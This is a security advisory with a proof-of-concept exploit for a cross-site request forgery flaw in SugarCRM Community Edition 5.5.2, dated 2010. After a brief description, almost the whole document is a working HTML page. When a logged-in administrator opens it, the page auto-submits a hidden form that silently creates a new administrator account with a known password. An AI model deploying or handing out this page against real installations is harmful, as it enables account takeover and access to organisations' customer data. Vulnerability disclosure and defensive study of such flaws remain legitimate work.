<!--=========================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Cross-site Request Forgery #
# Software.................SugarCRM Community Edition 5.5.2 #
# Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html #
# Date.....................5/30/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create #
# a new admin. #
# #
# #
# ##Proof of Concept## #
# -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>